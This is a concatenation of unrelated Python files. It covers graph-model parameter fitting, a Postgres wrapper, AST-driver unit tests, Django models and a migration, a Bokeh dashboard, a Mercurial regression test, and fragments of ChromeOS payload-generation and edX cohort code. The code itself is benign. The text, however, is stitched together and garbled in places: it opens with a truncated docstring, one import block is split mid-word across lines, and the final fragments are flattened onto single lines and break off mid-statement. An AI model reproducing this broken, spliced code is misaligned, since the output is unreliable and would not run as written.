"""Replace all @ with @@ in the string provid
"""Fit the two parameter vectors (x, y) of a thresholded weighted random
graph model so that the model's expected degrees and strengths match an
empirical (thresholded) matrix; includes a synthetic factor-model data
generator and diagnostic plots."""

import matplotlib.pyplot as plt
import numpy as np
from scipy.optimize import root
import bct

# Machine epsilon; added below to avoid log(0) in pij_wij.
eps = np.finfo(float).eps


def pij_wij(x, y, t):
    """Return (pij, wij): the model link probabilities and expected link
    weights for parameter vectors x, y at threshold t."""
    xij = np.outer(x, x)
    yij = np.outer(y, y)
    pij = xij * ((yij)**t) / (1.0 + xij * (yij**t) - (yij**t))
    wij = (t * (xij - 1.0) * (yij**t)) / ((1.0 + xij * (yij**t) - (yij**t))) - 1.0 / (np.log(np.abs(yij + eps)))
    return pij, wij


def eq(z, t, ki, si):
    """Residuals of the saddle-point equations: expected degrees minus ki
    concatenated with expected strengths minus si."""
    nz = len(z)
    n = nz // 2
    pij, wij = pij_wij(z[0:n], z[n:], t)  # x is first half, y is second half
    # print(pij.shape,wij.shape,ki.shape,si.shape)
    # pij -= pij.di
    # Self-links are excluded from the degree/strength sums.
    np.fill_diagonal(pij, 0)
    np.fill_diagonal(wij, 0)
    delta_pij = np.sum(pij, axis=0) - ki
    delta_wij = np.sum(wij, axis=0) - si
    return np.concatenate([delta_pij, delta_wij])


def factor_model(ci, T, eta, mu, correlation=False):
    """Generate a T x N synthetic dataset with block structure given by the
    membership vector ci, local noise eta and global signal mu; return its
    correlation matrix (zero diagonal) or covariance matrix."""
    N = len(ci)  # number of nodes, length of membership vector,
    # Initialize the observations vector a TxN matrix of NaNs,
    Y = np.ones([T, N]) * np.nan
    # Fill the identical observations in the maximally correlated subsets,
    for c in np.unique(ci):
        i = np.where(ci == c)[0]
        Y[:, i] = np.kron(np.ones((1, (ci == c).sum())), np.random.randn(T, 1))
    # Add local noise beta on each time-series,
    Y += eta * np.random.randn(T, N)
    # Add global signal mu that correlates globally each time series,
    Y += mu * np.kron(np.ones((1, N)), np.random.randn(T, 1))
    from scipy.stats import zscore
    Y = zscore(Y)
    if correlation:
        C = np.corrcoef(Y.T)
        np.fill_diagonal(C, 0)
    else:
        C = np.cov(Y.T)
    return C


def inference_cEWRGt(W, thresh):
    """Solve for the model parameters (x, y) matching the degrees and
    strengths of the empirical matrix W at threshold `thresh`."""
    k = (W > 0).sum(axis=0)  # degrees
    s = W.sum(axis=0)  # strength
    # from scipy.optimize import root
    from scipy.optimize import least_squares
    x0 = np.concatenate([k, s]) * 1E-4  # initial solution
    # Initialize least squares from previous solution
    sollm = least_squares(lambda v: eq(v, thresh, k, s), x0=x0, bounds=(0, np.inf), method='trf', ftol=1E-8, xtol=1E-8, verbose=1)
    # NOTE(review): the least_squares result above is immediately discarded;
    # root() restarts from x0, not from sollm -- confirm this is intended.
    sollm = root(lambda z: eq(z, thresh, k, s), x0=x0, method='lm', options={'xtol': 1E-30, 'gtol': 1E-30, 'ftol': 1E-30}, tol=1E-6)
    # print('Final cost', sollm['cost'])
    sollm = sollm['x']
    n2 = int(len(sollm) // 2)
    x, y = sollm[0:n2], sollm[n2:]
    return x, y


def plot_results(W, x, y, thresh):
    """Plot model pij / expected weights / empirical matrix, plus scatter
    plots comparing model vs empirical degrees and strengths."""
    pij, wij = pij_wij(x, y, thresh)  # compute the output from the optimization result
    plt.figure(figsize=(12, 8))
    plt.subplot(2, 3, 1)
    im = plt.imshow(pij)
    plt.colorbar(im, fraction=0.046, pad=0.04)
    plt.grid(False)
    plt.title('$p_{ij}$')
    plt.subplot(2, 3, 2)
    im = plt.imshow(wij)
    plt.colorbar(im, fraction=0.046, pad=0.04)
    plt.grid(False)
    plt.title('$<w_{ij}>$')
    plt.subplot(2, 3, 3)
    im = plt.imshow(W)
    plt.colorbar(im, fraction=0.046, pad=0.04)
    plt.grid(False)
    plt.title('empirical matrix')
    plt.subplot(2, 3, 4)
    plt.plot((W > 0).sum(axis=0), pij.sum(axis=0), 'b.')
    plt.plot(np.linspace(0, pij.sum(axis=0).max()), np.linspace(0, pij.sum(axis=0).max()), 'r-')
    plt.grid(True)
    plt.axis('equal')
    plt.title('$k_i - <k_i>$')
    plt.ylabel('model')
    plt.xlabel('empirical')
    # plt.xlim([0,min((W>0).sum(axis=0).max(),pij.sum(axis=0).max())])
    # plt.ylim([0,min((W>0).sum(axis=0).max(),pij.sum(axis=0).max())])
    plt.subplot(2, 3, 5)
    plt.plot(W.sum(axis=0), wij.sum(axis=0), 'b.')
    plt.plot(np.linspace(0, wij.sum(axis=0).max()), np.linspace(0, wij.sum(axis=0).max()), 'r-')
    plt.title('$ s_i - <s_i>$')
    plt.axis('equal')
    # plt.xlim([0,wij.sum(axis=0).max()])
    # plt.ylim([0,wij.sum(axis=0).max()])
    plt.grid(True)
    plt.ylabel('model')
    plt.xlabel('empirical')
    plt.tight_layout()
    plt.show()


if __name__ == '__main__':
    thresh = 0.2  # threshold
    T = 200  # number of time points to sample
    eta = 3.0  # localnoise
    mu = 1.0  # globalnoise
    # Fisher-transformed correlation matrix of three synthetic communities.
    C = np.arctanh(factor_model([1] * 40 + [2] * 40 + [3] * 30, T, eta, mu, True))
    At = bct.threshold_absolute(C, thresh)
    n = len(At)
    k = (At > 0).sum(axis=0)
    s = At.sum(axis=0)
    x, y = inference_cEWRGt(At, thresh)
    plot_results(At, x, y, thresh)
from configparser import ConfigParser
import psycopg2


class Postgres(object):
    """Thin psycopg2 wrapper configured from a local `database.ini` file."""

    def __init__(self, db_name):
        """Read the [postgresql] section of database.ini into a parameter
        dict, forcing the database name to `db_name`.

        Raises:
            Exception: when the ini file has no [postgresql] section.
        """
        ini_file = 'database.ini'
        section_name = 'postgresql'
        config = ConfigParser()
        config.read(ini_file)
        self.db = {}
        if not config.has_section(section_name):
            raise Exception('Section {0} not found in the {1} file'.format(section_name, ini_file))
        # `db_name` first; any `database` key in the ini intentionally wins,
        # matching the original assignment order.
        self.db['database'] = db_name
        for key, value in config.items(section_name):
            self.db[key] = value

    def connect(self):
        """Open a connection and cursor; on failure print the error
        (best-effort, as in the original)."""
        self.conn = None
        try:
            self.conn = psycopg2.connect(**self.db)
            self.cur = self.conn.cursor()
        except (Exception, psycopg2.DatabaseError) as error:
            print(error)

    def close(self):
        """Close the open connection."""
        self.conn.close()

    def execute(self, sql, params=()):
        """Execute a statement with `params` and commit immediately."""
        self.cur.execute(sql, params)
        self.conn.commit()

    def get_version(self):
        """Return the server version row reported by `SELECT version()`."""
        self.connect()
        self.cur.execute('SELECT version()')
        version = self.cur.fetchone()
        self.close()
        return version
import io
import json
import os
import subprocess
import sys
import unittest
from os.path import join, abspath, dirname

sys.path.append('..')
from python_driver import __version__, get_processor_instance
from python_driver.requestprocessor import (
    Request, Response, RequestProcessorJSON, InBuffer, EmptyCodeException)
from typing import Dict, Any, List, AnyStr, Optional, Iterator, cast

# Directory containing this test file; fixtures live in its `data/` subdir.
CURDIR = abspath(dirname(__file__))


# Disabled until I update the new module with typing
# class TestTypeCheck(unittest.TestCase):
#     def test_10_check(self) -> None:
#         prevdir = os.getcwd()
#         try:
#             os.chdir(dirname(CURDIR))
#             srcdir = abspath(join(dirname(CURDIR), 'python_driver', '*'))
#             self.assertEqual(subprocess.call(['test/typecheck.sh', srcdir], shell=True), 0)
#         finally:
#             os.chdir(prevdir)


class TestPythonDriverBase(unittest.TestCase):
    """Shared fixtures: a ParseAST request plus in-memory stdin/stdout."""

    def _restart_data(self, format_: str='json') -> None:
        """Reset self.data to a fresh ParseAST request over the helloworld
        fixture and recreate both mock buffers."""
        assert format_ == 'json'
        with open(join(CURDIR, 'data', 'helloworld.py')) as f:
            testcode = f.read()

        self.data = Request({
            'filepath': 'test.py',
            'action': 'ParseAST',
            'content': testcode,
            'language': 'python',
        })

        bufferclass = io.StringIO if format_ == 'json' else io.BytesIO

        # This will mock the python_driver stdin
        self.sendbuffer = bufferclass()
        # This will mock the python_driver stdout
        self.recvbuffer = bufferclass()

    @staticmethod
    def _extract_docs(inbuffer: InBuffer) -> Iterator[Response]:
        """
        This generator will read the inbuffer yielding the JSON
        docs when it finds the ending mark
        """
        line: str
        for line in inbuffer.readlines():
            yield json.loads(line)

    def _loadResults(self, format_: str) -> List[Response]:
        """Read all msgs from the recvbuffer"""
        self.recvbuffer.seek(0)
        res: List[Response] = []
        res = [doc for doc in self._extract_docs(self.recvbuffer)]
        return res


class Test10ProcessRequestFunc(TestPythonDriverBase):
    """End-to-end tests that drive process_requests through the buffers."""

    def _add_to_buffer(self, count: int, format_: str) -> None:
        """Add count test msgs to the sendbuffer"""
        for i in range(count):
            msg = ''
            msg = json.dumps(self.data, ensure_ascii=False) + '\n'
            self.sendbuffer.write(msg)
        self.sendbuffer.flush()

    def _send_receive(self, nummsgs: int, outformat: str='json',
                      dataupdate: Optional[Dict[AnyStr, Any]]=None,
                      restart_data: bool=True) -> List[Response]:
        """Queue `nummsgs` copies of self.data, run the processor over the
        mock stdin, and return the parsed replies.

        dataupdate, when given, is merged into the request before sending
        (used to inject broken content).
        """
        if restart_data:
            self._restart_data(outformat)

        if dataupdate:
            self.data.update(dataupdate)

        self._add_to_buffer(nummsgs, outformat)
        self.sendbuffer.seek(0)

        processor, _ = get_processor_instance(
            outformat,
            custom_outbuffer=self.recvbuffer,
            custom_inbuffer=self.sendbuffer
        )
        processor.process_requests(self.sendbuffer)
        return self._loadResults(outformat)

    def _check_reply_dict(self, response: Response, has_errors: bool=False) -> None:
        """Validate a single reply: error shape when has_errors, otherwise
        'ok' status plus a well-formed AST and a 2/3 language version."""
        self.assertIsInstance(response, dict)
        status = response.get('status')

        if has_errors:
            assert status in ('error', 'fatal')
            errors = response.get('errors', list)
            self.assertIsInstance(errors, list)
            self.assertGreater(len(errors), 0)
        else:
            self.assertEqual(status, 'ok')
            self._check_AST_dict(response)
            language_version = response['metadata'].get('language_version', -1)
            assert str(language_version) in ('2', '3')

    def _check_AST_dict(self, response: Response) -> None:
        """Structural checks on the 'ast' payload: root node with ast_type
        and a body whose items carry position information."""
        self.assertIsNotNone(response)
        assert 'ast' in response
        self.assertIsInstance(response['ast'], dict)
        root_key = list(response['ast'].keys())[0]
        assert root_key
        for key in ('ast_type', 'body'):
            assert key in response['ast'][root_key]

        self.assertIsInstance(response['ast'][root_key]['body'], list)
        for item in response['ast'][root_key]['body']:
            for key in ('ast_type', 'lineno', 'col_offset'):
                assert key in item

    def test_010_normal_json(self) -> None:
        replies = self._send_receive(1, 'json')
        self.assertEqual(len(replies), 1)
        self._check_reply_dict(replies[0])

    def test_020_normal_json_many(self) -> None:
        replies = self._send_receive(100, 'json')
        self.assertEqual(len(replies), 100)
        for reply in replies:
            self._check_reply_dict(reply)

    def test_030_error_print(self) -> None:
        # Unparseable source must produce an error reply with no AST...
        wrongcode = 'wtf lol'
        replies = self._send_receive(1, 'json', {'content': wrongcode})
        self.assertEqual(len(replies), 1)
        ast = replies[0].get('ast')
        self.assertIsNone(ast)
        self._check_reply_dict(replies[0], has_errors=True)

        # Check that it still alive
        self._restart_data()
        replies = self._send_receive(1, 'json')
        self.assertEqual(len(replies), 1)

    def test_040_broken_json(self) -> None:
        # Truncated JSON on the wire must yield a single 'fatal' reply.
        self._restart_data('json')
        brokendata = json.dumps(self.data, ensure_ascii=False)[:-30]
        self.sendbuffer.write(brokendata)
        self.sendbuffer.flush()
        reply = self._send_receive(1, 'json', restart_data=False)[0]
        self.assertEqual(reply['status'], 'fatal')
        self.assertEqual(len(reply['errors']), 1)


class Test20ReqProcMethods(TestPythonDriverBase):
    """Unit tests for individual RequestProcessorJSON methods."""

    def test_10_send_response_json(self) -> None:
        self._restart_data('json')
        processor = RequestProcessorJSON(self.recvbuffer)
        processor._send_response(cast(Response, self.data))
        res = self._loadResults('json')
        self.assertEqual(len(res), 1)
        self.assertDictEqual(self.data, res[0])

    # process request already tested with TestPythonDriverBase

    def test_20_return_error(self) -> None:
        self._restart_data('json')
        processor = RequestProcessorJSON(self.recvbuffer)
        processor.errors = ['test error']
        processor._return_error('test.py', 'fatal')
        res = self._loadResults('json')
        self.assertEqual(len(res), 1)
        self.assertDictEqual(res[0], {'driver': 'python23:%s' % __version__,
                                      'errors': ['test error'],
                                      'filepath': 'test.py',
                                      'ast': None,
                                      'status': 'fatal'})


if __name__ == '__main__':
    unittest.main()
# -*- coding: utf-8 -*-
"""Factories to help in tests."""
from factory import PostGenerationMethodCall, Sequence
from factory.alchemy import SQLAlchemyModelFactory

from authmgr.database import db
from authmgr.user.models import User


class BaseFactory(SQLAlchemyModelFactory):
    """Base factory."""

    class Meta:
        """Factory configuration."""

        # Abstract: never instantiated directly, only subclassed.
        abstract = True
        sqlalchemy_session = db.session


class UserFactory(BaseFactory):
    """User factory."""

    # Unique username/email per generated instance, keyed on the sequence n.
    username = Sequence(lambda n: 'user{0}'.format(n))
    email = Sequence(lambda n: 'user{0}@example.com'.format(n))
    # Hash the default password through User.set_password after creation.
    password = PostGenerationMethodCall('set_password', 'example')
    active = True

    class Meta:
        """Factory configuration."""

        model = User
###############################################################################
# Name: txtutil.py                                                            #
# Purpose: Text Utilities.                                                    #
# Author: Cody Precord <cprecord@editra.org>                                  #
# Copyright: (c) 2009 Cody Precord <staff@editra.org>                         #
# Licence: wxWindows Licence                                                  #
###############################################################################

"""
Editra Business Model Library: Text Utilities

Utility functions for managing and working with text.

"""

__author__ = "Cody Precord <cprecord@editra.org>"
__svnid__ = "$Id: txtutil.py 62571 2009-11-08 17:53:27Z CJP $"
__revision__ = "$Revision: 62571 $"

__all__ = [ 'IsUnicode', ]

#-----------------------------------------------------------------------------#
# Imports
import types

#-----------------------------------------------------------------------------#

# `types.UnicodeType` only exists on Python 2; resolve the unicode string
# type once so the check also works on Python 3 (where `str` is unicode).
try:
    _UNICODE_TYPE = types.UnicodeType   # Python 2
except AttributeError:
    _UNICODE_TYPE = str                 # Python 3

def IsUnicode(txt):
    """Is the given string a unicode string
    @param txt: object
    @return: bool

    """
    return isinstance(txt, _UNICODE_TYPE)
def on_square():
    """Placeholder handler; no behavior implemented yet."""
    pass

def total_after():
    """Placeholder; no behavior implemented yet."""
    pass
# -*- coding: utf-8 -*- import user import inscriptio
n import notes import util import stage # vim:expandtab:s
martindent:tabstop=4:softtabstop=4:shiftwidth=4:
pr
int("test\n")
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-06-01 12:02
# NOTE: auto-generated migration; kept in its generated form by convention.
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):
    """Add repo-count and top-technology columns to linkedin_user."""

    dependencies = [
        ('website', '0030_github_user'),
    ]

    operations = [
        migrations.AddField(
            model_name='linkedin_user',
            name='number_all_repos',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='linkedin_user',
            name='number_repos1',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='linkedin_user',
            name='number_repos2',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='linkedin_user',
            name='number_repos3',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='linkedin_user',
            name='technology1',
            field=models.CharField(default='', max_length=50),
        ),
        migrations.AddField(
            model_name='linkedin_user',
            name='technology2',
            field=models.CharField(default='', max_length=50),
        ),
        migrations.AddField(
            model_name='linkedin_user',
            name='technology3',
            field=models.CharField(default='', max_length=50),
        ),
    ]
from django.db import models


class BranchManager(models.Manager):
    """Manager providing get-or-create semantics for a user's active branch."""

    def get_branch(self, user, project):
        """Return the user's active branch on `project`, creating one if absent."""
        try:
            return self.get(user=user, project=project, active=True)
        except self.model.DoesNotExist:
            # Only a missing row should trigger creation.  The original bare
            # `except:` also swallowed unrelated errors (e.g. database errors
            # or MultipleObjectsReturned), masking real bugs.
            return self.create(user=user, project=project, active=True)


class Branch(models.Model):
    """A user's working branch on a project."""

    user = models.ForeignKey('auth.User')
    project = models.ForeignKey('projects.Project')
    active = models.BooleanField(default=True)
    pushed = models.BooleanField(default=False)
    title = models.TextField(default='')
    comment = models.TextField(default='')

    objects = BranchManager()

    def __unicode__(self):
        return "Branch of %s by %s (%s)" % (self.project, self.user, self.pk)
from django.apps import AppConfig
from django.utils.translation import ugettext_lazy as _


class NavConfig(AppConfig):
    """App configuration for the CMS navigation app."""

    name = 'cms.nav'
    # Lazily translated human-readable name shown in the admin.
    verbose_name = _('Navigation')
import sys
import os
import cv2
from keras.models import load_model

sys.path.append("/Users/alexpapiu/Documents/Conv/OpenCV_CNN")
from webcam_cnn_pipeline import return_compiled_model_2, real_time_pred

# Weights file name passed on the command line; also the key into all_labels
# below (e.g. "model_hand").
model_name = sys.argv[1]

# Capture frame size.  Kept as floats: cv2's set() accepts them, and the
# model input shape casts them to int below.
w = 1.5*144
h = 2*144

#keep track of all labels:
all_labels = {"model_hand":["A", "B", "C", "D", "No Hand"],
              "basic_model":["happy", "sad", "normal", "incredulous"],
              "model_face":["happy", "sad", "normal"]}

# Map class index -> label string for the chosen model.
labelz = dict(enumerate(all_labels[model_name]))

os.chdir("/Users/alexpapiu/Documents/Data/OpenCV_CNN")

# NOTE(review): input_shape is channels-first (3, H, W) — presumably the
# pipeline was trained with Theano-style image ordering; confirm against
# webcam_cnn_pipeline before changing.
model = return_compiled_model_2(input_shape = (3,int(h),int(w)),
                                num_class = len(labelz))
model.load_weights(model_name)

#open a new video:
cp = cv2.VideoCapture(0)
cp.set(3, w)   # property 3 = frame width
cp.set(4, h)   # property 4 = frame height

real_time_pred(model, labelz, cp = cp, nframes = 10000)
# pandas and numpy for data manipulation
import pandas as pd
import numpy as np
import sqlite3

from bokeh.plotting import Figure
from bokeh.models import (
    CategoricalColorMapper,
    HoverTool,
    ColumnDataSource,
    Panel,
    FuncTickFormatter,
    SingleIntervalTicker,
    LinearAxis,
)
from bokeh.models import Legend
from bokeh.models.widgets import (
    CheckboxGroup,
    Slider,
    RangeSlider,
    Tabs,
    CheckboxButtonGroup,
    TableColumn,
    DataTable,
    Select,
)
from bokeh.layouts import column, row, WidgetBox

import matplotlib

matplotlib.use("Agg")
import matplotlib.pyplot as plt
import matplotlib.colors as colors


def perfmon_tab(db):
    """Build the 'perfmon' dashboard tab from the sqlite `perfmon` table.

    Args:
        db: an open sqlite3 connection.

    Returns:
        A bokeh Panel with a column-selection checkbox group and a line
        plot, or None when the `perfmon` table does not exist.
    """

    def make_dataset(perfmon_list):
        """ColumnDataSource restricted to the selected perfmon columns."""
        newdf = perfmon[perfmon_list]
        # Convert dataframe to column data source
        return ColumnDataSource(newdf)

    def make_plot(src):
        """Line plot of every column present in src (the index excluded)."""
        # Blank plot with correct labels
        p = Figure(
            plot_width=1024,
            plot_height=768,
            x_axis_type="datetime",
            title="perfmon",
            output_backend="webgl",
        )

        # One distinct rainbow color per perfmon column.
        cm = plt.get_cmap("gist_rainbow")
        numlines = len(perfmon.columns)
        mypal = [cm(1.0 * i / numlines) for i in range(numlines)]
        mypal = list(map(lambda x: colors.rgb2hex(x), mypal))

        col = 0
        legenditems = []
        for key in src.data.keys():
            if key == "datetime":
                continue
            cline = p.line(
                perfmon.index.values,
                perfmon[key],
                line_width=1,
                alpha=0.8,
                # Use the current palette index, then advance it.  The
                # original incremented *before* indexing, which skipped
                # mypal[0] and raised IndexError once every column was
                # selected (col reached numlines).
                color=mypal[col],
            )
            col = col + 1
            legenditems += [(key, [cline])]

        p.legend.click_policy = "hide"
        legend = Legend(items=legenditems, location=(0, 0))
        p.add_layout(legend, "below")
        return p

    def update(attr, old, new):
        """Checkbox callback: rebuild the plot for the selected columns."""
        perfmons_to_plot = [
            perfmon_selection.labels[i] for i in perfmon_selection.active
        ]
        new_src = make_dataset(perfmons_to_plot)
        plot = make_plot(new_src)
        # TODO:crude hack in lack of a better solution so far
        layout.children[1] = plot

    # get data from DB, setup index
    cur = db.cursor()
    cur.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name=?", ["perfmon"]
    )
    if len(cur.fetchall()) == 0:
        return None

    perfmon = pd.read_sql_query("select * from perfmon", db)
    perfmon.index = pd.to_datetime(perfmon["datetime"])
    perfmon = perfmon.drop(["datetime"], axis=1)
    perfmon.index.name = "datetime"

    perfmon_selection = CheckboxGroup(
        labels=list(perfmon.columns),
        active=[0, 5],
        width=300,
        height=800,
        sizing_mode="fixed",
    )
    perfmon_list = [perfmon_selection.labels[i] for i in perfmon_selection.active]
    src = make_dataset(perfmon_list)
    plot = make_plot(src)
    perfmon_selection.on_change("active", update)

    controls = WidgetBox(perfmon_selection, width=300, height=800, sizing_mode="fixed")
    layout = row(controls, plot)
    tab = Panel(child=layout, title="perfmon")
    return tab
# Copyright (c) Meta Platforms, Inc. and affiliates.
# Copyright (c) Mercurial Contributors.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

from __future__ import absolute_import

from testutil.dott import feature, sh, testtmp  # noqa: F401


feature.require(["symlink"])

# Regression test: importing a patch that removes a symlink must not fail.
# https://bz.mercurial-scm.org/1438
sh % "hg init repo"
sh % "cd repo"
sh % "ln -s foo link"
sh % "hg add link"
sh % "hg ci -mbad link"
sh % "hg rm link"
sh % "hg ci -mok"
sh % "hg diff -g -r '0:1'" > "bad.patch"

sh % "hg up 0" == "1 files updated, 0 files merged, 0 files removed, 0 files unresolved"

sh % "hg import --no-commit bad.patch" == "applying bad.patch"

sh % "hg status" == r"""
    R link
    ? bad.patch"""
present. Args: builder_run: See builder_run on ArchivingStage. board: See board on ArchivingStage. archive_stage: See archive_stage on ArchivingStage. channels: Explicit list of channels to generate payloads for. If empty, will instead wait on values from push_image. Channels is normally None in release builds, and normally set for trybot 'payloads' builds. """ super(PaygenStage, self).__init__(builder_run, board, archive_stage, **kwargs) self.signing_results = {} self.channels = channels def _HandleStageException(self, exc_info): """Override and don't set status to FAIL but FORGIVEN instead.""" exc_type, exc_value, _exc_tb = exc_info # If Paygen fails to find anything needed in release.conf, treat it # as a warning, not a failure. This is common during new board bring up. if issubclass(exc_type, PaygenNoPaygenConfigForBoard): return self._HandleExceptionAsWarning(exc_info) # If the exception is a TestLabFailure that means we couldn't schedule the # test. We don't fail the build for that. We do the CompoundFailure dance, # because that's how we'll get failures from background processes returned # to us. if (issubclass(exc_type, failures_lib.TestLabFailure) or (issubclass(exc_type, failures_lib.CompoundFailure) and exc_value.MatchesFailureType(failures_lib.TestLabFailure))): return self._HandleExceptionAsWarning(exc_info) return super(PaygenStage, self)._HandleStageException(exc_info) def _JsonFromUrl(self, gs_ctx, url): """Fetch a GS Url, and parse it as Json. Args: gs_ctx: GS Context. url: Url to fetch and parse. Returns: None if the Url doesn't exist. Parsed Json structure if it did. Raises: MalformedResultsException if it failed to parse. """ try: signer_txt = gs_ctx.Cat(url).output except gs.GSNoSuchKey: return None try: return json.loads(signer_txt) except ValueError: # We should never see malformed Json, even for intermediate statuses. 
raise MalformedResultsException(signer_txt) def _SigningStatusFromJson(self, signer_json): """Extract a signing status from a signer result Json DOM. Args: signer_json: The parsed json status from a signer operation. Returns: string with a simple status: 'passed', 'failed', 'downloading', etc, or '' if the json doesn't contain a status. """ return (signer_json or {}).get('status', {}).get('status', '') def _CheckForResults(self, gs_ctx, instruction_urls_per_channel, channel_notifier): """timeout_util.WaitForSuccess func to check a list of signer results. Args: gs_ctx: Google Storage Context. instruction_urls_per_channel: Urls of the signer result files we're expecting. channel_notifier: BackgroundTaskRunner into which we push channels for processing. Returns: Number of results not yet collected. """ COMPLETED_STATUS = ('passed', 'failed') # Assume we are done, then try to prove otherwise. results_completed = True for channel in instruction_urls_per_channel.keys(): self.signing_results.setdefault(channel, {}) if (len(self.signing_results[channel]) == len(instruction_urls_per_channel[channel])): continue for url in instruction_urls_per_channel[channel]: # Convert from instructions URL to instructions result URL. url += '.json' # We already have a result for this URL. if url in self.signing_results[channel]: continue signer_json = self._JsonFromUrl(gs_ctx, url) if self._SigningStatusFromJson(signer_json) in COMPLETED_STATUS: # If we find a co
mpleted result, remember it. self.signing_results[channel][url] = signer_json # If we don't have full results for this channel, we aren't done # waiting. if (len(self.signing_results[channel]) != len(instruction_urls_per_channel[channel]))
: results_completed = False continue # If we reach here, the channel has just been completed for the first # time. # If all results 'passed' the channel was successfully signed. channel_success = True for signer_result in self.signing_results[channel].values(): if self._SigningStatusFromJson(signer_result) != 'passed': channel_success = False # If we successfully completed the channel, inform paygen. if channel_success: channel_notifier(channel) return results_completed def _WaitForPushImage(self): """Block until push_image data is ready. Returns: Push_image results, expected to be of the form: { 'channel': ['gs://instruction_uri1', 'gs://signer_instruction_uri2'] } Raises: MissingInstructionException: If push_image sent us an error, or timed out. """ try: instruction_urls_per_channel = self.board_runattrs.GetParallel( 'instruction_urls_per_channel', timeout=self.PUSHIMAGE_TIMEOUT) except cbuildbot_run.AttrTimeoutError: instruction_urls_per_channel = None # A value of None signals an error, either in PushImage, or a timeout. if instruction_urls_per_channel is None: raise MissingInstructionException('PushImage results not available.') return instruction_urls_per_channel def _WaitForSigningResults(self, instruction_urls_per_channel, channel_notifier): """Do the work of waiting for signer results and logging them. Args: instruction_urls_per_channel: push_image data (see _WaitForPushImage). channel_notifier: BackgroundTaskRunner into which we push channels for processing. Raises: ValueError: If the signer result isn't valid json. RunCommandError: If we are unable to download signer results. """ gs_ctx = gs.GSContext(dry_run=self._run.debug) try: cros_build_lib.Info('Waiting for signer results.') timeout_util.WaitForReturnTrue( self._CheckForResults, func_args=(gs_ctx, instruction_urls_per_channel, channel_notifier), timeout=self.SIGNING_TIMEOUT, period=self.SIGNING_PERIOD) except timeout_util.TimeoutError: msg = 'Image signing timed out.' 
cros_build_lib.Error(msg) cros_build_lib.PrintBuildbotStepText(msg) raise SignerResultsTimeout(msg) # Log all signer results, then handle any signing failures. failures = [] for url_results in self.signing_results.values(): for url, signer_result in url_results.iteritems(): result_description = os.path.basename(url) cros_build_lib.PrintBuildbotStepText(result_description) cros_build_lib.Info('Received results for: %s', result_description) cros_build_lib.Info(json.dumps(signer_result, indent=4)) status = self._SigningStatusFromJson(signer_result) if status != 'passed': failures.append(result_description) cros_build_lib.Error('Signing failed for: %s', result_description) if failures: cros_build_lib.Error('Failure summary:') for failure in failures: cros_build_lib.Error(' %s', failure) raise SignerFailure(failures) def PerformStage(self): """Do the work of generating our release payloads.""" # Convert to release tools naming for boards. board = self._current_board.replace('_', '-') version = self._run.attrs.release_tag assert version, "We can't generate payloads without a release_tag." logging.info("Generating payloads for: %s, %s", board, version) # Test to see if the current board has a Paygen configuration. We do # this here, no in the sub-process so we don't have to pass back a # failure reason. try: from crostools.lib import paygen_build_lib paygen_build_lib.ValidateBoardConfig(board) except
tings. Raises: Http404 if the course doesn't exist. """ return _get_course_cohort_settings(course_key).id def set_course_cohorted(course_key, cohorted): """ Given a course course and a boolean, sets whether or not the course is cohorted. Raises: Value error if `cohorted` is not a boolean """ if not isinstance(cohorted, bool): raise ValueError("Cohorted must be a boolean") course_cohort_settings = _get_course_cohort_settings(course_key) course_cohort_settings.is_cohorted = cohorted course_cohort_settings.save() def get_cohort_id(user, course_key, use_cached=False): """ Given a course key and a user, return the id of the cohort that user is assigned to in that course. If they don't have a cohort, return None. """ cohort = get_cohort(user, course_key, use_cached=use_cached) return None if cohort is None else cohort.id COHORT_CACHE_NAMESPACE = u"cohorts.get_cohort" def _cohort_cache_key(user_id, course_key): """ Returns the cache key for the given user_id and course_key. """ return u"{}.{}".format(user_id, course_key) def bulk_cache_cohorts(course_key, users): """ Pre-fetches and caches the cohort assignments for the given users, for later fast retrieval by get_cohort. """ # before populating the cache with another bulk set of data, # remove previously cached entries to keep memory usage low. 
request_cache.clear_cache(COHORT_CACHE_NAMESPACE) cache = request_cache.get_cache(COHORT_CACHE_NAMESPACE) if is_course_cohorted(course_key): cohorts_by_user = { membership.user: membership for membership in CohortMembership.objects.filter(user__in=users, course_id=course_key).select_related('user__id') } for user, membership in cohorts_by_user.iteritems(): cache[_cohort_cache_key(user.id, course_key)] = membership.course_user_group uncohorted_users = filter(lambda u: u not in cohorts_by_user, users) else: uncohorted_users = users for user in uncohorted_users: cache[_cohort_cache_key(user.id, course_key)] = None def get_cohort(user, course_key, assign=True, use_cached=False): """ Returns the user's cohort for the specified course. The cohort for the user is cached for the duration of a request. Pass use_cached=True to use the cached value instead of fetching from the database. Arguments: user: a Django User object. course_key: CourseKey assign (bool): if False then we don't assign a group to user use_cached (bool): Whether to use the cached value or fetch from database. Returns: A CourseUserGroup object if the course is cohorted and the User has a cohort, else None. Raises: ValueError if the CourseKey doesn't exist. """ cache = request_cache.get_cache(COHORT_CACHE_NAMESPACE) cache_key = _cohort_cache_key(user.id, course_key) if use_cached and cache_key in cache: return cache[cache_key] cache.pop(cache_key, None) # First check whether the course is cohorted (users shouldn't be in a cohort # in non-cohorted courses, but settings can change after course starts) if not is_course_cohorted(course_key): return cache.setdefault(cache_key, None) # If course is cohorted, check if the user already has a cohort. try: membership = CohortMembership.objects.get( course_id=course_key, user_id=user.id, ) return cache.setdefault(cache_key, membership.course_user_group) except CohortMembership.DoesNotExist: # Didn't find the group. If we do not want to assign, return here. 
